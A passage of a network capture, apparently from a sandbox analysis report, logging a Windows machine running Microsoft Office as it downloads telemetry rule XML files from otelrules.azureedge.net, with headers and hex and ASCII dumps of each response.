                                              2024-10-25 13:45:52 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                              Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24192.168.2.44977113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:53 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:53 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:53 GMT
                                              Content-Type: text/xml
                                              Content-Length: 450
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                              ETag: "0x8DC582BD4C869AE"
                                              x-ms-request-id: 9a0790d9-e01e-0052-7cad-26d9df000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134553Z-16849878b78rjhv97f3nhawr7s000000097000000000dx6r
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:53 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25192.168.2.44977013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:53 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:53 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:53 GMT
                                              Content-Type: text/xml
                                              Content-Length: 3788
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                              ETag: "0x8DC582BAC2126A6"
                                              x-ms-request-id: 2f084f0e-501e-0029-2021-26d0b8000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134553Z-r197bdfb6b4g24ztpxkw4umce8000000024g000000008sbs
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:53 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192.168.2.44977213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:53 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:53 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:53 GMT
                                              Content-Type: text/xml
                                              Content-Length: 2980
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                              ETag: "0x8DC582BA80D96A1"
                                              x-ms-request-id: 23ba7a24-801e-0015-5af3-24f97f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134553Z-r197bdfb6b4hdk8h12qtxfwscn000000016g000000009xh8
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:53 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27192.168.2.44977313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:53 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:53 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:53 GMT
                                              Content-Type: text/xml
                                              Content-Length: 408
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                              ETag: "0x8DC582BB56D3AFB"
                                              x-ms-request-id: 31a53d7e-801e-00a3-74f7-217cfb000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134553Z-16849878b787psctgubawhx7k8000000096g0000000021x0
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:53 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28192.168.2.44977413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:53 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:53 UTC563INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:53 GMT
                                              Content-Type: text/xml
                                              Content-Length: 2160
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Vary: Accept-Encoding
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                              ETag: "0x8DC582BA3B95D81"
                                              x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134553Z-16849878b78j7llf5vkyvvcehs00000001qg00000000bfkf
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:53 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29192.168.2.44977713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:54 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:54 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 471
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                              ETag: "0x8DC582BB10C598B"
                                              x-ms-request-id: d919e2dc-e01e-001f-153d-261633000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134554Z-17c5cb586f64v7xs992vpxwchg00000000eg000000007pq6
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L1_T2
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:54 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              30192.168.2.44977513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:54 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:54 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 474
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                              ETag: "0x8DC582B9964B277"
                                              x-ms-request-id: 7aa3dd97-101e-005a-6a20-26882b000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134554Z-r197bdfb6b4b4pw6nr8czsrctg000000014000000000hrqd
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              31192.168.2.44977813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:54 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:54 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 632
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                              ETag: "0x8DC582BB6E3779E"
                                              x-ms-request-id: f2ab8105-101e-0065-6df4-244088000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134554Z-r197bdfb6b4kq4j5t834fh90qn0000000cs0000000000n17
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:54 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              32192.168.2.44977913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:54 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:54 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 467
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                              ETag: "0x8DC582BA6C038BC"
                                              x-ms-request-id: b0d76b6d-d01e-002b-3e84-2525fb000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134554Z-16849878b78q4pnrt955f8nkx8000000092000000000mru3
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:54 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              33192.168.2.44977613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:54 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:54 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:54 GMT
                                              Content-Type: text/xml
                                              Content-Length: 415
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                              ETag: "0x8DC582B9F6F3512"
                                              x-ms-request-id: e1deb6d3-201e-006e-700b-22bbe3000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134554Z-16849878b78fmrkt2ukpvh9wh4000000095000000000ksaq
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              34192.168.2.44978113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:55 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:55 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:55 GMT
                                              Content-Type: text/xml
                                              Content-Length: 486
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                              ETag: "0x8DC582BB344914B"
                                              x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134555Z-16849878b785f8wh85a0w3ennn000000097g00000000cbhe
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
